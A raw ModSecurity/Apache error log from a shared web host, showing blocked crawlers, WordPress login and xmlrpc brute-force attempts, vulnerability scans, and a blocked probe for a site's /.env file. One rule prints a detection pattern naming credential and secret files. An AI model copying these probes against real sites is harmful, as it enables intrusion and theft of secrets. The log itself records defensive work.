[Tue May 26 16:46:52.264929 2026] [security2:error] [pid 823496:tid 823632] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBI5a08mrtyBNpA4PVfwAAAAQ"]
[Tue May 26 16:46:52.784489 2026] [security2:error] [pid 823496:tid 823731] [client 54.37.118.76:56892] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.cicodev.org"] [uri "/robots.txt"] [unique_id "ahWBJJa08mrtyBNpA4PVhQAAAGc"]
[Tue May 26 16:46:52.784591 2026] [security2:error] [pid 823496:tid 823731] [client 54.37.118.76:56892] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.cicodev.org"] [uri "/robots.txt"] [unique_id "ahWBJJa08mrtyBNpA4PVhQAAAGc"]
[Tue May 26 16:46:54.145684 2026] [security2:error] [pid 817651:tid 817885] [client 142.44.228.94:45486] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.cicodev.org"] [uri "/"] [unique_id "ahWBJtlGRCPPN1dS2y23QQAAAO0"]
[Tue May 26 16:46:54.145786 2026] [security2:error] [pid 817651:tid 817885] [client 142.44.228.94:45486] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.cicodev.org"] [uri "/"] [unique_id "ahWBJtlGRCPPN1dS2y23QQAAAO0"]
[Tue May 26 16:46:54.158544 2026] [core:crit] [pid 823496:tid 823691] (13)Permission denied: [client 52.167.144.18:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:46:54.826246 2026] [security2:error] [pid 823496:tid 823726] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBJpa08mrtyBNpA4PVmAAAAGI"]
[Tue May 26 16:46:54.971501 2026] [autoindex:error] [pid 817651:tid 817881] [client 93.158.91.24:33719] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:46:55.257196 2026] [security2:error] [pid 823496:tid 823735] [client 117.198.37.168:63598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBJ5a08mrtyBNpA4PVpwAAAGs"]
[Tue May 26 16:46:55.257347 2026] [security2:error] [pid 823496:tid 823735] [client 117.198.37.168:63598] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBJ5a08mrtyBNpA4PVpwAAAGs"]
[Tue May 26 16:46:55.417024 2026] [security2:error] [pid 823496:tid 823605] [remote 216.73.216.30:6296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWBJ5a08mrtyBNpA4PVqAAAVGo"]
[Tue May 26 16:46:55.724493 2026] [security2:error] [pid 823496:tid 823671] [client 138.185.203.107:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWBJpa08mrtyBNpA4PVoQAAACs"]
[Tue May 26 16:46:55.951092 2026] [security2:error] [pid 817651:tid 817727] [remote 103.95.119.103:41668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWBJ9lGRCPPN1dS2y23YwAAq0s"]
[Tue May 26 16:46:56.180140 2026] [security2:error] [pid 817651:tid 817851] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBJ9lGRCPPN1dS2y23UwAAAMs"]
[Tue May 26 16:46:57.259132 2026] [security2:error] [pid 817651:tid 817900] [client 62.60.130.233:53151] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/wp-login.php"] [unique_id "ahWBKdlGRCPPN1dS2y23cAAAAPw"]
[Tue May 26 16:46:57.682608 2026] [security2:error] [pid 823496:tid 823749] [client 62.60.130.233:55001] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/wp-login.php"] [unique_id "ahWBKZa08mrtyBNpA4PVrwAAAHk"]
[Tue May 26 16:46:58.664986 2026] [security2:error] [pid 817651:tid 817805] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBKdlGRCPPN1dS2y23eAAAAJ0"]
[Tue May 26 16:46:58.696460 2026] [security2:error] [pid 817651:tid 817891] [client 152.237.4.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWBKtlGRCPPN1dS2y23ggAAAPM"]
[Tue May 26 16:46:58.940094 2026] [security2:error] [pid 823496:tid 823629] [client 195.154.60.83:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWBKpa08mrtyBNpA4PVvQAAAAE"], referer: https://www.anujtradingco.com/
[Tue May 26 16:46:59.135486 2026] [security2:error] [pid 823496:tid 823736] [client 173.239.240.53:45767] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lifestylemne.me"] [uri "/wp-login.php"] [unique_id "ahWBKpa08mrtyBNpA4PVvwAAAGw"]
[Tue May 26 16:46:59.629343 2026] [security2:error] [pid 817651:tid 817794] [client 195.154.60.83:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWBK9lGRCPPN1dS2y23kQAAAJI"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1446660&moderation-hash=d1fd3e9e2153c077bcf21b9e3bfdff74
[Tue May 26 16:47:00.101990 2026] [security2:error] [pid 823496:tid 823571] [remote 178.156.182.155:42042] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWBK5a08mrtyBNpA4PVygAAGEg"]
[Tue May 26 16:47:00.675840 2026] [security2:error] [pid 817651:tid 817777] [remote 216.73.216.30:64560] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWBLNlGRCPPN1dS2y23nQAAw30"]
[Tue May 26 16:47:03.313151 2026] [security2:error] [pid 823496:tid 823702] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBLpa08mrtyBNpA4PV3QAAAEo"]
[Tue May 26 16:47:04.454888 2026] [security2:error] [pid 823496:tid 823636] [client 202.76.141.208:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBL5a08mrtyBNpA4PV6gAAAAg"]
[Tue May 26 16:47:04.735980 2026] [security2:error] [pid 823496:tid 823667] [client 62.60.130.233:52362] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "aastha-enterprises.onesoft.in"] [uri "/wp-login.php"] [unique_id "ahWBMJa08mrtyBNpA4PV-AAAACc"]
[Tue May 26 16:47:05.099703 2026] [security2:error] [pid 817651:tid 817898] [client 62.60.130.233:58733] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "aastha-enterprises.onesoft.in"] [uri "/wp-login.php"] [unique_id "ahWBMdlGRCPPN1dS2y23zwAAAPo"], referer: https://duckduckgo.com/
[Tue May 26 16:47:05.401740 2026] [security2:error] [pid 817651:tid 817786] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBL9lGRCPPN1dS2y23xgAAAIo"]
[Tue May 26 16:47:05.515709 2026] [security2:error] [pid 817651:tid 817794] [client 117.198.37.168:63909] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBMdlGRCPPN1dS2y231wAAAJI"]
[Tue May 26 16:47:05.515860 2026] [security2:error] [pid 817651:tid 817794] [client 117.198.37.168:63909] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBMdlGRCPPN1dS2y231wAAAJI"]
[Tue May 26 16:47:05.953200 2026] [security2:error] [pid 817651:tid 817700] [remote 57.141.2.56:36098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/archive.php"] [unique_id "ahWBMdlGRCPPN1dS2y232gAA1jA"]
[Tue May 26 16:47:06.354837 2026] [security2:error] [pid 817651:tid 817715] [remote 45.79.189.31:15464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.189.79.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWBMtlGRCPPN1dS2y233AAAlD8"]
[Tue May 26 16:47:06.563097 2026] [security2:error] [pid 823496:tid 823682] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBMZa08mrtyBNpA4PV_wAAADY"]
[Tue May 26 16:47:08.387673 2026] [security2:error] [pid 817651:tid 817790] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBM9lGRCPPN1dS2y237AAAAI4"]
[Tue May 26 16:47:09.650601 2026] [security2:error] [pid 823496:tid 823719] [client 168.119.53.160:13594] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWBNZa08mrtyBNpA4PWMgAAAFs"], referer: https://thegoodsporting.com
[Tue May 26 16:47:10.427648 2026] [security2:error] [pid 817651:tid 817671] [remote 216.73.216.30:64560] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWBNtlGRCPPN1dS2y24AwAAwRM"]
[Tue May 26 16:47:10.522362 2026] [security2:error] [pid 823496:tid 823755] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBNZa08mrtyBNpA4PWMQAAAH8"]
[Tue May 26 16:47:10.866397 2026] [security2:error] [pid 823496:tid 823724] [client 45.92.1.183:61520] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 183.1.92.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.kardashevtechnologies.com"] [uri "/xmlrpc.php"] [unique_id "ahWBNpa08mrtyBNpA4PWPwAAAGA"]
[Tue May 26 16:47:11.019819 2026] [security2:error] [pid 823496:tid 823626] [remote 74.7.241.58:55830] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWBN5a08mrtyBNpA4PWQgAAEn8"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 16:47:12.581261 2026] [security2:error] [pid 823496:tid 823682] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBN5a08mrtyBNpA4PWSQAAADY"]
[Tue May 26 16:47:12.627538 2026] [security2:error] [pid 823496:tid 823727] [client 74.7.241.174:33338] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.krishnawoodworks.com"] [uri "/cgi-sys/404.html"] [unique_id "ahWBOJa08mrtyBNpA4PWUwAAYzI"]
[Tue May 26 16:47:12.793618 2026] [security2:error] [pid 823496:tid 823513] [remote 52.18.195.140:60780] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWBOJa08mrtyBNpA4PWUgAACg4"]
[Tue May 26 16:47:14.568315 2026] [security2:error] [pid 823496:tid 823722] [client 176.65.139.232:62508] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "pgcsi.svijaykumar.in"] [uri "/.env"] [unique_id "ahWBOpa08mrtyBNpA4PWbQAAAF4"]
[Tue May 26 16:47:14.618774 2026] [security2:error] [pid 823496:tid 823702] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBOZa08mrtyBNpA4PWZQAAAEo"]
[Tue May 26 16:47:14.892894 2026] [security2:error] [pid 823496:tid 823696] [client 47.128.127.251:33332] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "staging.unsobered.com"] [uri "/robots.txt"] [unique_id "ahWBOpa08mrtyBNpA4PWcwAAAEQ"]
[Tue May 26 16:47:15.832941 2026] [security2:error] [pid 823496:tid 823698] [client 117.198.37.168:64231] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBO5a08mrtyBNpA4PWfgAAAEY"]
[Tue May 26 16:47:15.833062 2026] [security2:error] [pid 823496:tid 823698] [client 117.198.37.168:64231] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBO5a08mrtyBNpA4PWfgAAAEY"]
[Tue May 26 16:47:17.940600 2026] [security2:error] [pid 823496:tid 823736] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBO5a08mrtyBNpA4PWfQAAAGw"]
[Tue May 26 16:47:18.652069 2026] [security2:error] [pid 823496:tid 823580] [remote 142.93.171.165:55030] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.171.93.142.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahWBPpa08mrtyBNpA4PWmQAAVlE"]
[Tue May 26 16:47:18.965955 2026] [security2:error] [pid 817651:tid 817784] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBPdlGRCPPN1dS2y24NgAAAIg"]
[Tue May 26 16:47:20.860101 2026] [security2:error] [pid 817651:tid 817813] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBP9lGRCPPN1dS2y24WAAAAKU"]
[Tue May 26 16:47:23.128065 2026] [security2:error] [pid 823496:tid 823640] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBQZa08mrtyBNpA4PWwgAAAAw"]
[Tue May 26 16:47:24.892483 2026] [security2:error] [pid 817651:tid 817821] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBQ9lGRCPPN1dS2y24dwAAAK0"]
[Tue May 26 16:47:26.410919 2026] [security2:error] [pid 817651:tid 817898] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBRdlGRCPPN1dS2y24hwAAAPo"]
[Tue May 26 16:47:26.546224 2026] [security2:error] [pid 823496:tid 823639] [client 117.198.37.168:64553] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBRpa08mrtyBNpA4PW8AAAAAs"]
[Tue May 26 16:47:26.546450 2026] [security2:error] [pid 823496:tid 823639] [client 117.198.37.168:64553] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBRpa08mrtyBNpA4PW8AAAAAs"]
[Tue May 26 16:47:28.267577 2026] [security2:error] [pid 817651:tid 817861] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBR9lGRCPPN1dS2y24lAAAANU"]
[Tue May 26 16:47:28.941664 2026] [security2:error] [pid 823496:tid 823679] [client 143.110.209.223:53263] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.209.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWBSJa08mrtyBNpA4PXCAAAADM"]
[Tue May 26 16:47:28.941800 2026] [security2:error] [pid 823496:tid 823679] [client 143.110.209.223:53263] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "christinaspromotions.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWBSJa08mrtyBNpA4PXCAAAADM"]
[Tue May 26 16:47:30.178508 2026] [security2:error] [pid 823496:tid 823745] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBSZa08mrtyBNpA4PXDQAAAHU"]
[Tue May 26 16:47:30.925369 2026] [security2:error] [pid 823496:tid 823669] [client 172.224.240.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWBSpa08mrtyBNpA4PXHgAAACk"]
[Tue May 26 16:47:31.671931 2026] [security2:error] [pid 823496:tid 823656] [client 74.7.244.18:35064] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "mtm117.eu"] [uri "/cgi-sys/404.html"] [unique_id "ahWBS5a08mrtyBNpA4PXNAAAHEo"]
[Tue May 26 16:47:32.246911 2026] [security2:error] [pid 823496:tid 823662] [client 202.76.188.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBS5a08mrtyBNpA4PXKAAAACI"]
